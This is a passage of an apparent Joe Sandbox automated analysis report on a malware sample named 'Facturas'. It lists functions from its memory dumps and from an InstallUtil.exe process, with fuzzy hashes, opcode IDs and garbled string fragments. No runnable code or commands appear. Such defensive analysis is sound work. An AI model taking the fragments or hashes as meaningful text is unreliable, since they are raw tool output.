Opcode Fuzzy Hash: e70c01ae73c4df2c2e7491a9a3063ff3e3ce97ce0c919d2323d4bf19d9429f7e
Instruction Fuzzy Hash: C2F03A309042168BD7A29B54D9487A9B7B5BB05304F5040E8A11EA3780CF745AC8DF01

Function 02D80CB8 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6a586d0cb0727eefcae5c1970df6f6b88a7378139ca3d4d6d63197969b996876
Instruction ID: 2ab86de7840c99155230d0a5557b3df83f3516123c6ab635827e3fc915531825
Opcode Fuzzy Hash: 6a586d0cb0727eefcae5c1970df6f6b88a7378139ca3d4d6d63197969b996876
Instruction Fuzzy Hash: 4BE02B714A02405FC35D1A64C90EAFB7BB8DBDA321B044525E6D2C3272CB78898BCD51

Function 0657FF18 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e80b93fe43bcdd32d53fed4087b0737b4586ae557c33bcb44c28bcf194285a9f
Instruction ID: 63dfaa892eedce89925e528e18bd1e8bc383ee77b53bf22c8b302cc0e9bf7406
Opcode Fuzzy Hash: e80b93fe43bcdd32d53fed4087b0737b4586ae557c33bcb44c28bcf194285a9f
Instruction Fuzzy Hash: 2EE08674908208EFC744DF94E940A6DBFB8BF46301F14C199D84457341CB319A42DBD1

Function 02D80AD8 Relevance: .0, Instructions: 21COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 723a412453827142370319e85805b2a8b810ca13ec16b43375142a4b58306446
Instruction ID: ff2555a965bb5e1f2d99fa0e349e76e6d3ffb33a49ccaf212a1fbf9210577e96
Opcode Fuzzy Hash: 723a412453827142370319e85805b2a8b810ca13ec16b43375142a4b58306446
Instruction Fuzzy Hash: C8E01A74E04209EFCB40FFB8E58159CBBF0EB48201F6045B9C90AA7310EA306F08DBA1

Function 0657FB48 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 391ef9f6c4d36f15e7aa708ad25f2e0989db309a4eaad070aa7e0c4743e49751
Instruction ID: 64907e0174abd54be2b1504f40c70eebb7060776df3b3f54a185e177d35483a2
Opcode Fuzzy Hash: 391ef9f6c4d36f15e7aa708ad25f2e0989db309a4eaad070aa7e0c4743e49751
Instruction Fuzzy Hash: 0FE01A34D08208AFCB44DF94D5906ACBBF4AB48200F1081A9884857341CA31AA41DB85

Function 06578828 Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 391ef9f6c4d36f15e7aa708ad25f2e0989db309a4eaad070aa7e0c4743e49751
Instruction ID: cbdb143ecf67d573749383919a8441137a3d5f55c69e394452e28abba2fa6ca9
Opcode Fuzzy Hash: 391ef9f6c4d36f15e7aa708ad25f2e0989db309a4eaad070aa7e0c4743e49751
Instruction Fuzzy Hash: 15E01A34D08208EFC744DF94D5456ACBBF4AB48200F1085E9884853341CB319A41DB81

Function 0657DEC0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c83bdb3c0eec110ed3872d87aff4fbfffc9edd1e21344bdf6732d8b0d18fafb3
Instruction ID: 24abf43f00b40408b5db0f5a58c1afd24c2cd2e60f0b67a9048ddbe71fb1e6a6
Opcode Fuzzy Hash: c83bdb3c0eec110ed3872d87aff4fbfffc9edd1e21344bdf6732d8b0d18fafb3
Instruction Fuzzy Hash: 45E0EC3490820CDBC745DB94E64566DFBB4BF55305F1486998C0827355CB31AE42DB81

Function 0657B300 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f4f30fd0ad10bf2b2cf13fd5553bf638cec9084149842d2d5cd404368909db65
Instruction ID: 017299f75fbc6d0b19214688a6643a4e243d4a7b1c73299ce0075641a56e22f4
Opcode Fuzzy Hash: f4f30fd0ad10bf2b2cf13fd5553bf638cec9084149842d2d5cd404368909db65
Instruction Fuzzy Hash: 1BE01271941208DBCB11EFF1D54879EBBF8AB09201F1049A59905E3120EE315E44EB96

Function 02D8F3D0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed4962f7f16c0482cd0cd45d9b34a129611f07fb154b2f0c38d50e030e6815bc
Instruction ID: c987956ba81ea784e4e6ff86e9d26bba6c2616b2fb3f4e31a597c66ce8185282
Opcode Fuzzy Hash: ed4962f7f16c0482cd0cd45d9b34a129611f07fb154b2f0c38d50e030e6815bc
Instruction Fuzzy Hash: E9E08C31800208EFC701EBF1D508A8EB7F8AB0A201F0048A6D40893110EF318A44E792

Function 06564ADC Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a3325ac30e4a9653300921d8fa32903e0d1b05bab071528fe52050abc7aab864
Instruction ID: e6f0a2e843f522c72469ab0fb9e8fc77832bc9d42d518b34ec3fe353b3bba0da
Opcode Fuzzy Hash: a3325ac30e4a9653300921d8fa32903e0d1b05bab071528fe52050abc7aab864
Instruction Fuzzy Hash: 1BF0A5789442698FEBA1DF26D844BEDBBB2FB48304F1040E9D409A3294DB349EC4CF84

Function 02D82BAF Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb1e50afaddbb87fbc1119476cad21ea4c0aee9c622136951c2150d3e72e7f9b
Instruction ID: a0fedc6924e66c6852cb616d3754fde0c34036de836ce40233e16f8e4b4eca13
Opcode Fuzzy Hash: bb1e50afaddbb87fbc1119476cad21ea4c0aee9c622136951c2150d3e72e7f9b
Instruction Fuzzy Hash: 26D05B2170A1949FCA033779B4041EDAB52EB957157484067C6819B26DCA248C09C3A5

Function 02D8098F Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: baffae92786d2898cfe8895df46d4b4fcd551c00c56e9627e1df843e15c40e18
Instruction ID: e456cab47b428ea3b71efc967a2cc1585311082da1388debe5addbd73ef11854
Opcode Fuzzy Hash: baffae92786d2898cfe8895df46d4b4fcd551c00c56e9627e1df843e15c40e18
Instruction Fuzzy Hash: DDD002201D63569FD3832AB1EC896E03BE0EE9226230900A1E4A6C5175EAED0D9B9E11

Function 02D80F68 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ad093594212f5c798eb162df2fb2c4b464c7ed107f64ac89d030718a6d42c950
Instruction ID: 38c13880a1a81213af789270f29f05d11a2b10d6f0251f5393d310603d60b557
Opcode Fuzzy Hash: ad093594212f5c798eb162df2fb2c4b464c7ed107f64ac89d030718a6d42c950
Instruction Fuzzy Hash: E3D06779604401DF8384EB24E484D2933F5BB89712315C999F44AC73A9DA31DC19CB10

Function 02D80861 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e4d82142842383692a4b38781c592d4a5e13aba83d22268705e121b5a40c32c7
Instruction ID: 3a5a3fc10c1416d736d8677e1e49d67a1956f588b69dd9beab6a90f741665a8e
Opcode Fuzzy Hash: e4d82142842383692a4b38781c592d4a5e13aba83d22268705e121b5a40c32c7
Instruction Fuzzy Hash: E6D0A730C902048F8B94BEF555090697BF4EB4212570001AEC446D2511D97948438F41

Function 0657E288 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b839027eb5d26fb4860fc278a5d4db3c9ea66ff9f778a5a32ad07c7b42d0885
Instruction ID: 0dc0426e1fd60293b53654e8d3c85459f53459d68380c8de8c07b14fa475c42c
Opcode Fuzzy Hash: 5b839027eb5d26fb4860fc278a5d4db3c9ea66ff9f778a5a32ad07c7b42d0885
Instruction Fuzzy Hash: 7AC08C3004A3058AD2611244BD0E3767BDCA306306F802840650C110208F705040CA82

Function 02D8F200 Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2bc3a44fffb48dd58b0921421277098b2b6488ba0adee1465b9dcf19379c89e
Instruction ID: 4a860e3619856a9c00fc0832b3d85589a1bb63844fb819749d562cf6620a896e
Opcode Fuzzy Hash: f2bc3a44fffb48dd58b0921421277098b2b6488ba0adee1465b9dcf19379c89e
Instruction Fuzzy Hash: 9EC012320506048BC211B7A0AA0E3283BEC6B0230AF400020A408A54204F7064C0DBAB

Function 02D80848 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 72f1e4ee542b73868fd9787910dc489c957cacb57fc68520ed032f94669bb117
Instruction ID: 1f418373e280497228dd4e41fcf30eb451a1caa34fbb58a51c03188c91317be3
Opcode Fuzzy Hash: 72f1e4ee542b73868fd9787910dc489c957cacb57fc68520ed032f94669bb117
Instruction Fuzzy Hash: B5A012350001088B86113763B60E055375CA7401113480021F60D400244A3015008740

Function 02D80E77 Relevance: .0, Instructions: 3COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80486af0ab9a6967e30839f8b53737f928e589c2d059185a285b0fe82e07e4ba
Instruction ID: c9b8eca7df2207af8ed2d60af19c5df3ae9e4f622d0b66ea073c621c6824cb0c
Opcode Fuzzy Hash: 80486af0ab9a6967e30839f8b53737f928e589c2d059185a285b0fe82e07e4ba
Instruction Fuzzy Hash:

Non-executed Functions

Function 02D8B740 Relevance: 2.7, Strings: 2, Instructions: 165COMMON

Download Yara Rule

Strings

4'q, xrefs: 02D8B822
4'q, xrefs: 02D8B7F7

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID: 4'q$4'q
API String ID: 0-1467158625
Opcode ID: a4f21134a1d87ecb6e58c49fa88098b945326755a2fc67377e319c14700ae0b9
Instruction ID: be23bb29d58af1b1a8e54eacd222be62915f801188e5874de5c1c3bbc7001f6c
Opcode Fuzzy Hash: a4f21134a1d87ecb6e58c49fa88098b945326755a2fc67377e319c14700ae0b9
Instruction Fuzzy Hash: 90711BB2E052059FD719EF7BE58069ABBF2FBC8204F04C12DD0089B369EB311906CB51

Function 0657DF00 Relevance: .2, Instructions: 197COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fb0d1dcec6fd37b55a7bb00716c1fa06b8281b1724dcbb86635fe2b4ec1e10b9
Instruction ID: fcd2d63139fc08fa26a2c7324b628ef6cec76d3b688ca85e9010c404a2749e54
Opcode Fuzzy Hash: fb0d1dcec6fd37b55a7bb00716c1fa06b8281b1724dcbb86635fe2b4ec1e10b9
Instruction Fuzzy Hash: 7B814770E04318CFEB64DF6AE844BAEBBF2BF8A300F1085A9D409A7251DB345985CF51

Function 06560040 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5957880682807b7526d3f198458a41d171d7f6cac7563cc528a7bb4ebb677345
Instruction ID: 827e66b43f43aaf3fc1a64a9af6ea97a72d4cf02048f99f0086ac5c20cf3a807
Opcode Fuzzy Hash: 5957880682807b7526d3f198458a41d171d7f6cac7563cc528a7bb4ebb677345
Instruction Fuzzy Hash: CF41EB70E052198FDB68DF6AC9487DABBF2BF89300F00C1EAA41DA7254DB745A85CF41

Function 06560006 Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1262782585.0000000006560000.00000040.00000800.00020000.00000000.sdmp, Offset: 06560000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6560000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 19799cff14b614fc205952b41e6a77fb6e275052bd4e079834e19cb2bb9a9cb3
Instruction ID: c88d442297da4b9d38da767c7e0620743613a5468a0c465b8da4e32d2542f54b
Opcode Fuzzy Hash: 19799cff14b614fc205952b41e6a77fb6e275052bd4e079834e19cb2bb9a9cb3
Instruction Fuzzy Hash: 83311071D097548FDB2ACF678C4829ABFF6AF86200F05C0FA944C9B256D7740A85DF51

Function 02D8BDD0 Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1248731648.0000000002D80000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D80000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2d80000_Facturas.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1566de2fafcbfb054d6db4ba37a26f3a2dc344786e7c7941bdb2d7b1b338bd87
Instruction ID: 447d4fae428cdd20ba691196dc8fbdd9e89476a3ffee36471b773c9b328ad51c
Opcode Fuzzy Hash: 1566de2fafcbfb054d6db4ba37a26f3a2dc344786e7c7941bdb2d7b1b338bd87
Instruction Fuzzy Hash: 3A3184B1D056188BEB18CF6BC94478EFBF7AFC8304F14C1AAC508A6264DB7509858F50

Analysis Process: InstallUtil.exePID: 5652, Parent PID: 4056COMMON

Executed Functions

Function 004180C0 Relevance: 42.8, Strings: 30, Instructions: 5260COMMON

Download Yara Rule

Strings

<r@, xrefs: 0041822B
|@, xrefs: 00419472
`K@, xrefs: 0041B49C
`K@, xrefs: 0041CD80
$y@, xrefs: 004191EB
|@, xrefs: 00419592
u@, xrefs: 0041893A
s@, xrefs: 00418423
Py@, xrefs: 00419216
lt@, xrefs: 00418646
LW@, xrefs: 0041981B
`K@, xrefs: 0041CD10
pu@, xrefs: 0041883E
z@, xrefs: 004195BD
x{@, xrefs: 004193AE
pr@, xrefs: 00418256
~@, xrefs: 004198F1
t@, xrefs: 00418742
Hw@, xrefs: 00418CFF
tv@, xrefs: 00418A36
d}@, xrefs: 00419841
`K@, xrefs: 0041AAD8
z@, xrefs: 0041949D
x~@, xrefs: 004198C6
`s@, xrefs: 0041844E
@x@, xrefs: 00418FF3
<u@, xrefs: 00418813
~, xrefs: 0041DA54
4v@, xrefs: 00418A0B
x@, xrefs: 00418F22

Memory Dump Source

Source File: 00000002.00000002.2479468406.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2479468406.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000424000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallUtil.jbxd

Similarity

API ID:
String ID: s@$ x@$$y@$4v@$<r@$<u@$@x@$Hw@$LW@$Py@$`K@$`K@$`K@$`K@$`s@$d}@$lt@$pr@$pu@$tv@$x{@$x~@$~$t@$u@$z@$z@$|@$|@$~@
API String ID: 0-2854204627
Opcode ID: ec7127498ec9052c6ee3a16494a6e6a95e67342d6652496fd65e49b334b6974c
Instruction ID: cd1238cb892e0809614d3a7698cac06728c892b0adc5475661a5d29870e6a4de
Opcode Fuzzy Hash: ec7127498ec9052c6ee3a16494a6e6a95e67342d6652496fd65e49b334b6974c
Instruction Fuzzy Hash: EDC3E5759002199BDB65DF54CD88BDEB7B4FB48300F1082EAE50AA72A0DB749BC5CF94

Function 00415A7C Relevance: 41.4, Strings: 31, Instructions: 2689COMMON

Download Yara Rule

Strings

<r@, xrefs: 0041822B
|@, xrefs: 00419472
u, xrefs: 0041D4F3
Xa@, xrefs: 004170D4
$y@, xrefs: 004191EB
|@, xrefs: 00419592
u@, xrefs: 0041893A
s@, xrefs: 00418423
Py@, xrefs: 00419216
lt@, xrefs: 00418646
Tc@, xrefs: 00417E1A
LW@, xrefs: 0041981B
pu@, xrefs: 0041883E
z@, xrefs: 004195BD
x{@, xrefs: 004193AE
pr@, xrefs: 00418256
~@, xrefs: 004198F1
t@, xrefs: 00418742
Hw@, xrefs: 00418CFF
tv@, xrefs: 00418A36
d}@, xrefs: 00419841
z@, xrefs: 0041949D
x~@, xrefs: 004198C6
%, xrefs: 00417F5E
`s@, xrefs: 0041844E
@x@, xrefs: 00418FF3
<u@, xrefs: 00418813
Tc@, xrefs: 00417118
Xa@, xrefs: 00417DF8
4v@, xrefs: 00418A0B
x@, xrefs: 00418F22

Memory Dump Source

Source File: 00000002.00000002.2479468406.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2479468406.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000424000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallUtil.jbxd

Similarity

API ID:
String ID: s@$ x@$$y@$%$4v@$<r@$<u@$@x@$Hw@$LW@$Py@$Tc@$Tc@$Xa@$Xa@$`s@$d}@$lt@$pr@$pu@$tv@$u$x{@$x~@$t@$u@$z@$z@$|@$|@$~@
API String ID: 0-853974828
Opcode ID: a4baee60d7de1b791c0fa6fbf7429bdf81bd9cc1682a48a38343d43ef3874059
Instruction ID: 3ae471a71860d70bf5efe0ac5fd41e2a2758c2df4d1d71ace5e418c4e6e896b1
Opcode Fuzzy Hash: a4baee60d7de1b791c0fa6fbf7429bdf81bd9cc1682a48a38343d43ef3874059
Instruction Fuzzy Hash: 9E530675900219DFCB64DF54DD88BDEB7B5FB48300F1081EAE50AA72A0DB74AA89CF54

Function 004141C3 Relevance: 19.7, Strings: 14, Instructions: 2162COMMON

Download Yara Rule

Strings

th@, xrefs: 00414CD8
r, xrefs: 0041577F
Xa@, xrefs: 004170D4
Dl@, xrefs: 00414ECA
hm@, xrefs: 004150BC
tl@, xrefs: 00414FC3
$S@, xrefs: 00415386
%, xrefs: 00417F5E
Tc@, xrefs: 00417118
Xa@, xrefs: 00417DF8
h@, xrefs: 00414DA6
LS@, xrefs: 00415482
Tc@, xrefs: 00417E1A
(e@, xrefs: 00414BB4

Memory Dump Source

Source File: 00000002.00000002.2479468406.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2479468406.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000424000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallUtil.jbxd

Similarity

API ID:
String ID: $S@$%$(e@$Dl@$LS@$Tc@$Tc@$Xa@$Xa@$hm@$r$th@$tl@$h@
API String ID: 0-1838652025
Opcode ID: 2f1f0938844631d737d982d916689e432ee32dfb2594b8a9ae58cd89aae0abc2
Instruction ID: 91d4546641d963c92022fa374ae719c168c60833f31618205443493ba3400418
Opcode Fuzzy Hash: 2f1f0938844631d737d982d916689e432ee32dfb2594b8a9ae58cd89aae0abc2
Instruction Fuzzy Hash: A933F775900219DFDB14DF60DD88BEEB7B5FB48300F1081EAE50AA72A0DB745A89CF59

Function 004159F0 Relevance: 18.7, Strings: 13, Instructions: 2467COMMON

Download Yara Rule

Strings

8n@, xrefs: 00415EBD
n@, xrefs: 004163F6
Xa@, xrefs: 004170D4
Tc@, xrefs: 004162B6
%, xrefs: 00417F5E
Tc@, xrefs: 00417118
Xa@, xrefs: 00417DF8
<c@, xrefs: 00416EB9
dp@, xrefs: 00416EDB
dp@, xrefs: 00417BFF
<c@, xrefs: 00417BDD
Tc@, xrefs: 00417E1A
Xa@, xrefs: 00416272

Memory Dump Source

Source File: 00000002.00000002.2479468406.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2479468406.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000424000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallUtil.jbxd

Similarity

API ID:
String ID: %$8n@$<c@$<c@$Tc@$Tc@$Tc@$Xa@$Xa@$Xa@$dp@$dp@$n@
API String ID: 0-3826138598
Opcode ID: e489497b3378d0d08f06b16b7d4984dedc34fbc45745cbb34f4c350bebddc688
Instruction ID: 89d4855e1e0ca5d46bbbcf893ee290a70224172783df434c0dee5972be7cea86
Opcode Fuzzy Hash: e489497b3378d0d08f06b16b7d4984dedc34fbc45745cbb34f4c350bebddc688
Instruction Fuzzy Hash: 4343F575900219DFDB14DFA0DD98FDEB7B9BB48300F1081AAE10AB72A4DB745A89CF54

Function 0041F040 Relevance: 16.1, Strings: 11, Instructions: 2387COMMON

Download Yara Rule

Strings

d, xrefs: 0041F9CF
Xa@, xrefs: 00420717
`K@, xrefs: 004207D4
Xa@, xrefs: 0041F4D0
|W@, xrefs: 00420E54
b, xrefs: 00421850
Tc@, xrefs: 0041F5A1
Tc@, xrefs: 004207E8
`K@, xrefs: 004214CE
`K@, xrefs: 0041FBD1
`K@, xrefs: 004214F6

Memory Dump Source

Source File: 00000002.00000002.2479468406.0000000000413000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2479468406.0000000000400000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000411000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000424000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000042B000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.000000000043E000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.2479468406.0000000000440000.00000040.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_InstallUtil.jbxd

Similarity

API ID:
String ID: Tc@$Tc@$Xa@$Xa@$`K@$`K@$`K@$`K@$b$d$|W@
API String ID: 0-924408810
Opcode ID: b8f8434967908b92698a54180c96c8bd94fb021f4b26e335d3f099063f7cb42d
Instruction ID: 82b5e8e5aa286496a22ff66abebf63c9d752432a8223fd3a4a840b9eedc08251
Opcode Fuzzy Hash: b8f8434967908b92698a54180c96c8bd94fb021f4b26e335d3f099063f7cb42d
Instruction Fuzzy Hash: 3A3306B5900219DFDB15DFA0DD98BDEB7B9BB48300F0085EEE10AA7260DB745A89CF54

Function 00411001 Relevance: 14.2, Strings: 10, Instructions: 1718COMMON

Download Yara Rule

Strings

D, xrefs: 00411412
Tc@, xrefs: 00417118
Xa@, xrefs: 00417DF8
d`@, xrefs: 00411D41
